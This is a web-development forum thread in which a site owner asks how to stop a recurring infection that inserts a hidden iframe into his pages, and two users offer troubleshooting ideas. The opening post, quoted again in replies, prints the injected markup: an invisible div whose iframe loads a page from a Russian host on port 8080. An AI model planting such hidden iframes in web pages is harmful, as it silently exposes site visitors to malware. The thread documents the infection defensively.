Skip to content
  • Categories
  • Recent
  • Tags
  • Popular
  • World
  • Users
  • Groups
Skins
  • Light
  • Cerulean
  • Cosmo
  • Flatly
  • Journal
  • Litera
  • Lumen
  • Lux
  • Materia
  • Minty
  • Morph
  • Pulse
  • Sandstone
  • Simplex
  • Sketchy
  • Spacelab
  • United
  • Yeti
  • Zephyr
  • Dark
  • Cyborg
  • Darkly
  • Quartz
  • Slate
  • Solar
  • Superhero
  • Vapor

  • Default (No Skin)
  • No Skin
Collapse
Code Project
  1. Home
  2. Web Development
  3. IFRAME Virus code Injection : Problem

IFRAME Virus code Injection : Problem

Scheduled Pinned Locked Moved Web Development
databasehelpphptutorialquestion
5 Posts 3 Posters 0 Views 1 Watching
  • Oldest to Newest
  • Newest to Oldest
  • Most Votes
Reply
  • Reply as topic
Log in to reply
This topic has been deleted. Only users with topic management privileges can see it.
  • K Offline
    K Offline
    Kiran S S
    wrote on last edited by
    #1

    Hi, On my website a virus is injecting IFRAME Virus code. I tried to replace that infected files with the original one, but that virus again injected the code. I also tried changing FTP and Control Panel Passwords. Still the virus has infected the files. I have also checked my pc for viruses by scanning using Antivirus with updated database. Bust still this virus has managed to infect my pages. I have also gone through the log files of domain. But it doesn’t help me. The virus injects following type of code in default.asp and index.htm files. e.g.

    <body>
    <div style="display:none">
    <iframe src="http://medical-static-center.ru:8080/index.php" width=649 height=958 ></iframe>
    </div>
    <div style="display:none"></div><div style="display:none"></div>
    <div style="display:none"></div><div style="display:none"></div>
    <div style="display:none"></div><div style="display:none"></div>

    The source (src="") of iframe varies each time of infection. It puts the code immediately after <body> tag. Please help me. How to stops this virus from infecting my web pages?

    Kiran Sajanikar

    L G 2 Replies Last reply
    0
    • K Kiran S S

      Hi, On my website a virus is injecting IFRAME Virus code. I tried to replace that infected files with the original one, but that virus again injected the code. I also tried changing FTP and Control Panel Passwords. Still the virus has infected the files. I have also checked my pc for viruses by scanning using Antivirus with updated database. Bust still this virus has managed to infect my pages. I have also gone through the log files of domain. But it doesn’t help me. The virus injects following type of code in default.asp and index.htm files. e.g.

      <body>
      <div style="display:none">
      <iframe src="http://medical-static-center.ru:8080/index.php" width=649 height=958 ></iframe>
      </div>
      <div style="display:none"></div><div style="display:none"></div>
      <div style="display:none"></div><div style="display:none"></div>
      <div style="display:none"></div><div style="display:none"></div>

      The source (src="") of iframe varies each time of infection. It puts the code immediately after <body> tag. Please help me. How to stops this virus from infecting my web pages?

      Kiran Sajanikar

      L Offline
      L Offline
      Lost User
      wrote on last edited by
      #2

      Kiran S. S. wrote:

      How to stops this virus from infecting my web pages?

      Did your Antivirus software identify what virus you have on your PC. Perhaps you need to check the AV web sites for similar problems. Try Google searches for the URI that is being injected. Are you absolutely certain this is a virus rather than a bug in your code?

      K 1 Reply Last reply
      0
      • L Lost User

        Kiran S. S. wrote:

        How to stops this virus from infecting my web pages?

        Did your Antivirus software identify what virus you have on your PC. Perhaps you need to check the AV web sites for similar problems. Try Google searches for the URI that is being injected. Are you absolutely certain this is a virus rather than a bug in your code?

        K Offline
        K Offline
        Kiran S S
        wrote on last edited by
        #3

        I am not sure about that virus is present in my pc. Because my localhost server is not being infected. Only my remote files are get infected. Some kind of robotic software (May be virus) is injecting this code in my website.

        Kiran Sajanikar

        L 1 Reply Last reply
        0
        • K Kiran S S

          I am not sure about that virus is present in my pc. Because my localhost server is not being infected. Only my remote files are get infected. Some kind of robotic software (May be virus) is injecting this code in my website.

          Kiran Sajanikar

          L Offline
          L Offline
          Lost User
          wrote on last edited by
          #4

          Well you need to check every machine involved in this for viruses. You also need to check your code quite carefully to ensure you have not left any security holes that a virus or trojan can break into.

          1 Reply Last reply
          0
          • K Kiran S S

            Hi, On my website a virus is injecting IFRAME Virus code. I tried to replace that infected files with the original one, but that virus again injected the code. I also tried changing FTP and Control Panel Passwords. Still the virus has infected the files. I have also checked my pc for viruses by scanning using Antivirus with updated database. Bust still this virus has managed to infect my pages. I have also gone through the log files of domain. But it doesn’t help me. The virus injects following type of code in default.asp and index.htm files. e.g.

            <body>
            <div style="display:none">
            <iframe src="http://medical-static-center.ru:8080/index.php" width=649 height=958 ></iframe>
            </div>
            <div style="display:none"></div><div style="display:none"></div>
            <div style="display:none"></div><div style="display:none"></div>
            <div style="display:none"></div><div style="display:none"></div>

            The source (src="") of iframe varies each time of infection. It puts the code immediately after <body> tag. Please help me. How to stops this virus from infecting my web pages?

            Kiran Sajanikar

            G Offline
            G Offline
            gardinio
            wrote on last edited by
            #5

            Hey Kiran ! I have the same issue... and I found some data about it. This virus was supposed to infect machines and stole FTP credentials from your ftp client. But instead of that (at least at my case) it is listening for the traffic flow, and gets your credentials when you make a connection. Once the user and password were stoled, I found regular connections from foreing IPs. So for now, I did this: - remove manualy the iframes in your computer. - Upload the files - Change the password and don't use it until you clean this virus. I couldn't find the name of this virus yet, if you do, please, tell me ! Some tips: - I have nod32, and it found nothing in my PC. - Panda security (web scann) can't find nothing either. - When people with AVG and Avast try to go to an infected page, their AV gives them a message about the threat. I hope it helps you a bit. Regards. Edgar

            1 Reply Last reply
            0
            Reply
            • Reply as topic
            Log in to reply
            • Oldest to Newest
            • Newest to Oldest
            • Most Votes


            • Login

            • Don't have an account? Register

            • Login or register to search.
            • First post
              Last post
            0
            • Categories
            • Recent
            • Tags
            • Popular
            • World
            • Users
            • Groups